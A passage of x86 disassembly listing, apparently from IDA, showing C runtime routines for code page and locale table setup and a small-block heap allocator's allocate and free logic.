mov edi, offset byte_407220
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_406E48[esi]
loc_40396D: ; CODE XREF: sub_4038A7:loc_4039AA�j
cmp byte ptr [ebx], 0
mov ecx, ebx
loc_403972: ; DATA XREF: .rsrc:0040B5FE�r
; sub_40B723-113�r ...
jz short loc_4039A0
loc_403974: ; CODE XREF: sub_4038A7:loc_40399E�j
mov dl, [ecx+1]
test dl, dl
jz short loc_4039A0
movzx eax, byte ptr [ecx]
loc_40397E: ; DATA XREF: sub_409B29+CA�w
; sub_409B29+DA�w ...
movzx edi, dl
cmp eax, edi
ja short loc_403999
mov edx, [ebp+var_4]
mov dl, byte_406E30[edx]
loc_40398E: ; CODE XREF: sub_4038A7+F0�j
; DATA XREF: sub_40ACEB+20�w ...
or byte_407221[eax], dl
inc eax
cmp eax, edi
jbe short loc_40398E
loc_403999: ; CODE XREF: sub_4038A7+DC�j
inc ecx
loc_40399A: ; DATA XREF: .rsrc:0040AF7C�w
; .rsrc:0040B4BD�r
inc ecx
cmp byte ptr [ecx], 0
loc_40399E: ; DATA XREF: .rsrc:0040AFFD�w
; .rsrc:0040B04C�r
jnz short loc_403974
loc_4039A0: ; CODE XREF: sub_4038A7:loc_403972�j
; sub_4038A7+D2�j
inc [ebp+var_4]
add ebx, 8
loc_4039A6: ; DATA XREF: sub_40ACA4+1�w
; sub_40ACA4+30�w ...
cmp [ebp+var_4], 4
loc_4039AA: ; DATA XREF: sub_40ACA4+8�w
; sub_40ACA4+36�w ...
jb short loc_40396D
mov eax, [ebp+arg_0]
mov dword_40711C, 1
push eax
loc_4039BA: ; DATA XREF: sub_409B29+57�r
mov CodePage, eax
call sub_403A8A
lea esi, dword_406E3C[esi]
loc_4039CA: ; DATA XREF: sub_40B723-43�w
; sub_40B723-15�r
mov edi, offset dword_407110
movsd
movsd
pop ecx
mov Locale, eax
movsd
jmp short loc_403A2F
; ---------------------------------------------------------------------------
loc_4039DA: ; CODE XREF: sub_4038A7+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_40392E
loc_4039E6: ; CODE XREF: sub_4038A7+7E�j
; sub_4038A7+8B�j
push 1
pop eax
loc_4039E9: ; CODE XREF: sub_4038A7+14F�j
or byte_407221[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_4039E9
push esi
call sub_403A8A
pop ecx
mov Locale, eax
mov dword_40711C, 1
jmp short loc_403A16
; ---------------------------------------------------------------------------
loc_403A10: ; CODE XREF: sub_4038A7+74�j
mov dword_40711C, ebx
loc_403A16: ; CODE XREF: sub_4038A7+167�j
xor eax, eax
mov edi, offset dword_407110
stosd
stosd
stosd
jmp short loc_403A2F
; ---------------------------------------------------------------------------
loc_403A22: ; CODE XREF: sub_4038A7+51�j
cmp dword_4070AC, ebx
jz short loc_403A38
loc_403A2A: ; CODE XREF: sub_4038A7+27�j
call sub_403ABD
loc_403A2F: ; CODE XREF: sub_4038A7+131�j
; sub_4038A7+179�j
call sub_403AE6
loc_403A34: ; CODE XREF: sub_4038A7+1D�j
xor eax, eax
jmp short loc_403A3B
; ---------------------------------------------------------------------------
loc_403A38: ; CODE XREF: sub_4038A7+181�j
or eax, 0FFFFFFFFh
loc_403A3B: ; CODE XREF: sub_4038A7+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_4038A7 endp
; =============== S U B R O U T I N E =======================================
sub_403A40 proc near ; CODE XREF: sub_4038A7+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword_4070AC, 0
cmp eax, 0FFFFFFFEh
jnz short loc_403A60
mov dword_4070AC, 1
jmp GetOEMCP
; ---------------------------------------------------------------------------
loc_403A60: ; CODE XREF: sub_403A40+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_403A75
mov dword_4070AC, 1
jmp GetACP
; ---------------------------------------------------------------------------
loc_403A75: ; CODE XREF: sub_403A40+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_403A89
mov eax, dword_4070D4
mov dword_4070AC, 1
locret_403A89: ; CODE XREF: sub_403A40+38�j
retn
sub_403A40 endp
; =============== S U B R O U T I N E =======================================
sub_403A8A proc near ; CODE XREF: sub_4038A7+118�p
; sub_4038A7+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_403AB7
sub eax, 4
jz short loc_403AB1
sub eax, 0Dh
jz short loc_403AAB
dec eax
jz short loc_403AA5
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_403AA5: ; CODE XREF: sub_403A8A+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_403AAB: ; CODE XREF: sub_403A8A+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_403AB1: ; CODE XREF: sub_403A8A+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_403AB7: ; CODE XREF: sub_403A8A+9�j
mov eax, 411h
retn
sub_403A8A endp
; =============== S U B R O U T I N E =======================================
sub_403ABD proc near ; CODE XREF: sub_4038A7:loc_403A2A�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_407220
rep stosd
stosb
xor eax, eax
mov edi, offset dword_407110
mov CodePage, eax
mov dword_40711C, eax
mov Locale, eax
stosd
stosd
stosd
pop edi
retn
sub_403ABD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403AE6 proc near ; CODE XREF: sub_4038A7:loc_403A2F�p
CharType = word ptr -514h
var_314 = byte ptr -314h
DestStr = byte ptr -214h
MultiByteStr = byte ptr -114h
CPInfo = _cpinfo ptr -14h
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+CPInfo]
push esi
push eax ; lpCPInfo
push CodePage ; CodePage
call GetCPInfo ; GetCPInfo
cmp eax, 1
jnz loc_403C1F
xor eax, eax
mov esi, 100h
loc_403B10: ; CODE XREF: sub_403AE6+34�j
mov [ebp+eax+MultiByteStr], al
inc eax
cmp eax, esi
jb short loc_403B10
mov al, [ebp+CPInfo.LeadByte]
mov [ebp+MultiByteStr], 20h
test al, al
jz short loc_403B61
push ebx
push edi
lea edx, [ebp+CPInfo.LeadByte+1]
loc_403B2F: ; CODE XREF: sub_403AE6+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_403B56
sub ecx, eax
lea edi, [ebp+eax+MultiByteStr]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_403B56: ; CODE XREF: sub_403AE6+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_403B2F
pop edi
pop ebx
loc_403B61: ; CODE XREF: sub_403AE6+42�j
push 0 ; int
lea eax, [ebp+CharType]
push Locale ; Locale
push CodePage ; CodePage
push eax ; lpCharType
lea eax, [ebp+MultiByteStr]
push esi ; cbMultiByte
push eax ; lpMultiByteStr
push 1 ; dwInfoType
call sub_40371C
push 0 ; int
lea eax, [ebp+DestStr]
push CodePage ; CodePage
push esi ; cchDest
push eax ; lpDestStr
lea eax, [ebp+MultiByteStr]
push esi ; cbMultiByte
push eax ; lpMultiByteStr
push esi ; dwMapFlags
push Locale ; Locale
call sub_4046FE
push 0 ; int
lea eax, [ebp+var_314]
push CodePage ; CodePage
push esi ; cchDest
push eax ; lpDestStr
lea eax, [ebp+MultiByteStr]
push esi ; cbMultiByte
push eax ; lpMultiByteStr
push 200h ; dwMapFlags
push Locale ; Locale
call sub_4046FE
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+CharType]
loc_403BDC: ; CODE XREF: sub_403AE6+135�j
mov dx, [ecx]
test dl, 1
jz short loc_403BFA
or byte_407221[eax], 10h
mov dl, [ebp+eax+DestStr]
loc_403BF2: ; CODE XREF: sub_403AE6+127�j
mov byte_407120[eax], dl
jmp short loc_403C16
; ---------------------------------------------------------------------------
loc_403BFA: ; CODE XREF: sub_403AE6+FC�j
test dl, 2
jz short loc_403C0F
or byte_407221[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_403BF2
; ---------------------------------------------------------------------------
loc_403C0F: ; CODE XREF: sub_403AE6+117�j
and byte_407120[eax], 0
loc_403C16: ; CODE XREF: sub_403AE6+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_403BDC
jmp short loc_403C68
; ---------------------------------------------------------------------------
loc_403C1F: ; CODE XREF: sub_403AE6+1D�j
xor eax, eax
mov esi, 100h
loc_403C26: ; CODE XREF: sub_403AE6+180�j
cmp eax, 41h
jb short loc_403C44
cmp eax, 5Ah
ja short loc_403C44
or byte_407221[eax], 10h
mov cl, al
add cl, 20h
loc_403C3C: ; CODE XREF: sub_403AE6+174�j
mov byte_407120[eax], cl
jmp short loc_403C63
; ---------------------------------------------------------------------------
loc_403C44: ; CODE XREF: sub_403AE6+143�j
; sub_403AE6+148�j
cmp eax, 61h
jb short loc_403C5C
cmp eax, 7Ah
ja short loc_403C5C
or byte_407221[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_403C3C
; ---------------------------------------------------------------------------
loc_403C5C: ; CODE XREF: sub_403AE6+161�j
; sub_403AE6+166�j
and byte_407120[eax], 0
loc_403C63: ; CODE XREF: sub_403AE6+15C�j
inc eax
cmp eax, esi
jb short loc_403C26
loc_403C68: ; CODE XREF: sub_403AE6+137�j
pop esi
leave
retn
sub_403AE6 endp
; =============== S U B R O U T I N E =======================================
sub_403C6B proc near ; CODE XREF: sub_402D47+9�p
; sub_402D9F+D�p ...
cmp dword_407448, 0
jnz short locret_403C86
push 0FFFFFFFDh
call sub_4038A7
pop ecx
mov dword_407448, 1
locret_403C86: ; CODE XREF: sub_403C6B+7�j
retn
sub_403C6B endp
; =============== S U B R O U T I N E =======================================
sub_403C87 proc near ; CODE XREF: sub_402D9F+9D�p
; sub_4030A5+BF�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_403CB4
push esi
call sub_403D68
pop ecx
test eax, eax
push esi
jz short loc_403CA6
push eax
call sub_403D93
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_403CA6: ; CODE XREF: sub_403C87+13�j
push 0 ; dwFlags
push hHeap ; hHeap
call HeapFree
loc_403CB4: ; CODE XREF: sub_403C87+7�j
pop esi
retn
sub_403C87 endp
; =============== S U B R O U T I N E =======================================
sub_403CB6 proc near ; CODE XREF: sub_402D9F+3A�p
; sub_402D9F+6F�p ...
arg_0 = dword ptr 4
push dword_4070E0
push [esp+4+arg_0]
call sub_403CC8
pop ecx
pop ecx
retn
sub_403CB6 endp
; =============== S U B R O U T I N E =======================================
sub_403CC8 proc near ; CODE XREF: sub_403CB6+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_403CF1
loc_403CCF: ; CODE XREF: sub_403CC8+27�j
push [esp+arg_0]
call sub_403CF4
test eax, eax
pop ecx
jnz short locret_403CF3
cmp [esp+arg_4], eax
jz short locret_403CF3
push [esp+arg_0]
call sub_40494D
test eax, eax
pop ecx
jnz short loc_403CCF
loc_403CF1: ; CODE XREF: sub_403CC8+5�j
xor eax, eax
locret_403CF3: ; CODE XREF: sub_403CC8+13�j
; sub_403CC8+19�j
retn
sub_403CC8 endp
; =============== S U B R O U T I N E =======================================
sub_403CF4 proc near ; CODE XREF: sub_403CC8+B�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_406F28
ja short loc_403D0C
push esi
call sub_4040BE
test eax, eax
pop ecx
jnz short loc_403D28
loc_403D0C: ; CODE XREF: sub_403CF4+B�j
test esi, esi
jnz short loc_403D13
push 1
pop esi
loc_403D13: ; CODE XREF: sub_403CF4+1A�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi ; dwBytes
push 0 ; dwFlags
push hHeap ; hHeap
call HeapAlloc
loc_403D28: ; CODE XREF: sub_403CF4+16�j
pop esi
retn
sub_403CF4 endp
; =============== S U B R O U T I N E =======================================
sub_403D2A proc near ; CODE XREF: sub_403382+20�p
push 140h ; dwBytes
push 0 ; dwFlags
push hHeap ; hHeap
call HeapAlloc
test eax, eax
mov lpMem, eax
jnz short loc_403D47
retn
; ---------------------------------------------------------------------------
loc_403D47: ; CODE XREF: sub_403D2A+1A�j
and dword_4070F4, 0
and dword_4070F8, 0
push 1
mov dword_4070F0, eax
mov dword_4070E8, 10h
pop eax
retn
sub_403D2A endp
; =============== S U B R O U T I N E =======================================
sub_403D68 proc near ; CODE XREF: sub_403C87+A�p
arg_0 = dword ptr 4
mov eax, dword_4070F8
lea ecx, [eax+eax*4]
mov eax, lpMem
lea ecx, [eax+ecx*4]
loc_403D78: ; CODE XREF: sub_403D68+26�j
cmp eax, ecx
jnb short loc_403D90
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_403D92
add eax, 14h
jmp short loc_403D78
; ---------------------------------------------------------------------------
loc_403D90: ; CODE XREF: sub_403D68+12�j
xor eax, eax
locret_403D92: ; CODE XREF: sub_403D68+21�j
retn
sub_403D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D93 proc near ; CODE XREF: sub_403C87+16�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov eax, [ecx+10h]
mov esi, edx
sub esi, [ecx+0Ch]
mov ebx, [edx-4]
add edx, 0FFFFFFFCh
push edi
shr esi, 0Fh
mov ecx, esi
mov edi, [edx-4]
imul ecx, 204h
dec ebx
mov [ebp+var_4], edi
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ebx
mov [ebp+var_10], ecx
mov ecx, [ebx+edx]
test cl, 1
mov [ebp+var_8], ecx
jnz short loc_403E59
sar ecx, 4
push 3Fh
dec ecx
pop edi
mov [ebp+arg_4], ecx
cmp ecx, edi
jbe short loc_403DEB
mov [ebp+arg_4], edi
loc_403DEB: ; CODE XREF: sub_403D93+53�j
mov ecx, [ebx+edx+4]
cmp ecx, [ebx+edx+8]
jnz short loc_403E3D
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403E19
mov edi, 80000000h
shr edi, cl
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+44h], edi
dec byte ptr [ecx]
jnz short loc_403E3D
mov ecx, [ebp+arg_0]
and [ecx], edi
jmp short loc_403E3D
; ---------------------------------------------------------------------------
loc_403E19: ; CODE XREF: sub_403D93+68�j
add ecx, 0FFFFFFE0h
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+0C4h], edi
dec byte ptr [ecx]
jnz short loc_403E3D
mov ecx, [ebp+arg_0]
and [ecx+4], edi
loc_403E3D: ; CODE XREF: sub_403D93+60�j
; sub_403D93+7D�j ...
mov ecx, [ebx+edx+8]
mov edi, [ebx+edx+4]
mov [ecx+4], edi
mov ecx, [ebx+edx+4]
mov edi, [ebx+edx+8]
add ebx, [ebp+var_8]
mov [ecx+8], edi
mov [ebp+var_C], ebx
loc_403E59: ; CODE XREF: sub_403D93+45�j
mov edi, ebx
sar edi, 4
dec edi
cmp edi, 3Fh
jbe short loc_403E67
push 3Fh
pop edi
loc_403E67: ; CODE XREF: sub_403D93+CF�j
mov ecx, [ebp+var_4]
and ecx, 1
mov [ebp+var_14], ecx
jnz loc_403F16
sub edx, [ebp+var_4]
mov ecx, [ebp+var_4]
sar ecx, 4
push 3Fh
mov [ebp+var_8], edx
dec ecx
pop edx
cmp ecx, edx
mov [ebp+arg_4], ecx
jbe short loc_403E92
mov [ebp+arg_4], edx
mov ecx, edx
loc_403E92: ; CODE XREF: sub_403D93+F8�j
add ebx, [ebp+var_4]
mov edi, ebx
mov [ebp+var_C], ebx
sar edi, 4
dec edi
cmp edi, edx
jbe short loc_403EA4
mov edi, edx
loc_403EA4: ; CODE XREF: sub_403D93+10D�j
cmp ecx, edi
jz short loc_403F13
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
cmp edx, [ecx+8]
jnz short loc_403EFB
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403ED7
mov edx, 80000000h
shr edx, cl
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+44h], edx
dec byte ptr [ecx]
jnz short loc_403EFB
mov ecx, [ebp+arg_0]
and [ecx], edx
jmp short loc_403EFB
; ---------------------------------------------------------------------------
loc_403ED7: ; CODE XREF: sub_403D93+126�j
add ecx, 0FFFFFFE0h
mov edx, 80000000h
shr edx, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+0C4h], edx
dec byte ptr [ecx]
jnz short loc_403EFB
mov ecx, [ebp+arg_0]
and [ecx+4], edx
loc_403EFB: ; CODE XREF: sub_403D93+11E�j
; sub_403D93+13B�j ...
mov ecx, [ebp+var_8]
mov edx, [ecx+8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov [edx+8], ecx
loc_403F13: ; CODE XREF: sub_403D93+113�j
mov edx, [ebp+var_8]
loc_403F16: ; CODE XREF: sub_403D93+DD�j
cmp [ebp+var_14], 0
jnz short loc_403F25
cmp [ebp+arg_4], edi
jz loc_403FAE
loc_403F25: ; CODE XREF: sub_403D93+187�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_403FAE
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_403F82
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_403F71
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_403F71: ; CODE XREF: sub_403D93+1CE�j
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
lea eax, [eax+esi*4+44h]
or [eax], ebx
jmp short loc_403FAB
; ---------------------------------------------------------------------------
loc_403F82: ; CODE XREF: sub_403D93+1C8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_403F98
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_403F98: ; CODE XREF: sub_403D93+1F3�j
lea ecx, [edi-20h]
mov edi, 80000000h
shr edi, cl
lea eax, [eax+esi*4+0C4h]
or [eax], edi
loc_403FAB: ; CODE XREF: sub_403D93+1ED�j
mov ebx, [ebp+var_C]
loc_403FAE: ; CODE XREF: sub_403D93+18C�j
; sub_403D93+1B6�j
mov eax, [ebp+var_10]
mov [edx], ebx
mov [ebx+edx-4], ebx
dec dword ptr [eax]
jnz loc_4040B9
mov eax, dword_4070F4
test eax, eax
jz loc_4040AB
mov ecx, dword_4070EC
mov edi, VirtualFree
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h ; dwFreeType
push ebx ; dwSize
push ecx ; lpAddress
call edi ; VirtualFree
mov ecx, dword_4070EC
mov eax, dword_4070F4
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_4070F4
mov ecx, dword_4070EC
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_4070F4
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_4070F4
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_404039
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_4070F4
loc_404039: ; CODE XREF: sub_403D93+29B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_4040AB
push ebx ; dwFreeType
push 0 ; dwSize
push dword ptr [eax+0Ch] ; lpAddress
call edi ; VirtualFree
mov eax, dword_4070F4
push dword ptr [eax+10h] ; lpMem
push 0 ; dwFlags
push hHeap ; hHeap
call HeapFree
mov eax, dword_4070F8
mov edx, lpMem
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_4070F4
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_404970
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_4070F8
cmp eax, dword_4070F4
jbe short loc_40409D
sub eax, 14h
loc_40409D: ; CODE XREF: sub_403D93+305�j
mov ecx, lpMem
mov dword_4070F0, ecx
jmp short loc_4040AE
; ---------------------------------------------------------------------------
loc_4040AB: ; CODE XREF: sub_403D93+233�j
; sub_403D93+2AA�j
mov eax, [ebp+arg_0]
loc_4040AE: ; CODE XREF: sub_403D93+316�j
mov dword_4070F4, eax
mov dword_4070EC, esi
loc_4040B9: ; CODE XREF: sub_403D93+226�j
pop edi
pop esi
pop ebx
leave
retn
sub_403D93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040BE proc near ; CODE XREF: sub_403CF4+E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_4070F8
mov edx, lpMem
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_4040FE
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_40410E
; ---------------------------------------------------------------------------
loc_4040FE: ; CODE XREF: sub_4040BE+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_40410E: ; CODE XREF: sub_4040BE+3E�j
mov eax, dword_4070F0
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_404135
loc_40411C: ; CODE XREF: sub_4040BE+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404135
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_40411C
loc_404135: ; CODE XREF: sub_4040BE+5C�j
; sub_4040BE+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_4041B3
mov ebx, edx
loc_40413C: ; CODE XREF: sub_4040BE+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404158
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404156
add ebx, 14h
jmp short loc_40413C
; ---------------------------------------------------------------------------
loc_404156: ; CODE XREF: sub_4040BE+91�j
cmp ebx, eax
loc_404158: ; CODE XREF: sub_4040BE+83�j
jnz short loc_4041B3
loc_40415A: ; CODE XREF: sub_4040BE+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_404170
cmp dword ptr [ebx+8], 0
jnz short loc_40416D
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_40415A
; ---------------------------------------------------------------------------
loc_40416D: ; CODE XREF: sub_4040BE+A5�j
cmp ebx, [ebp+var_4]
loc_404170: ; CODE XREF: sub_4040BE+9F�j
jnz short loc_404198
mov ebx, edx
loc_404174: ; CODE XREF: sub_4040BE+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404188
cmp dword ptr [ebx+8], 0
jnz short loc_404186
add ebx, 14h
jmp short loc_404174
; ---------------------------------------------------------------------------
loc_404186: ; CODE XREF: sub_4040BE+C1�j
cmp ebx, eax
loc_404188: ; CODE XREF: sub_4040BE+BB�j
jnz short loc_404198
call sub_4043C7
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_4041AC
loc_404198: ; CODE XREF: sub_4040BE:loc_404170�j
; sub_4040BE:loc_404188�j
push ebx
call sub_404478
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_4041B3
loc_4041AC: ; CODE XREF: sub_4040BE+D8�j
xor eax, eax
jmp loc_4043C2
; ---------------------------------------------------------------------------
loc_4041B3: ; CODE XREF: sub_4040BE+7A�j
; sub_4040BE:loc_404158�j ...
mov dword_4070F0, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_4041DA
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404211
loc_4041DA: ; CODE XREF: sub_4040BE+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_40420E
loc_4041F7: ; CODE XREF: sub_4040BE+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_4041F7
loc_40420E: ; CODE XREF: sub_4040BE+137�j
mov edx, [ebp+var_4]
loc_404211: ; CODE XREF: sub_4040BE+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_40423A
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_40423A: ; CODE XREF: sub_4040BE+16D�j
; sub_4040BE+183�j
test ecx, ecx
jl short loc_404243
shl ecx, 1
inc edi
jmp short loc_40423A
; ---------------------------------------------------------------------------
loc_404243: ; CODE XREF: sub_4040BE+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_404260
push 3Fh
pop esi
loc_404260: ; CODE XREF: sub_4040BE+19D�j
cmp esi, edi
jz loc_404375
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_4042D1
cmp edi, 20h
jge short loc_4042A0
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_4042CE
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_4042D1
; ---------------------------------------------------------------------------
loc_4042A0: ; CODE XREF: sub_4040BE+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_4042CE
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_4042D1
; ---------------------------------------------------------------------------
loc_4042CE: ; CODE XREF: sub_4040BE+1D6�j
; sub_4040BE+203�j
mov ebx, [ebp+arg_0]
loc_4042D1: ; CODE XREF: sub_4040BE+1B0�j
; sub_4040BE+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_404381
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_404372
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_404343
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_404331
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_404331: ; CODE XREF: sub_4040BE+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_404372
; ---------------------------------------------------------------------------
loc_404343: ; CODE XREF: sub_4040BE+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_40435C
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_40435C: ; CODE XREF: sub_4040BE+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_404372: ; CODE XREF: sub_4040BE+24E�j
; sub_4040BE+283�j
mov ecx, [ebp+var_8]
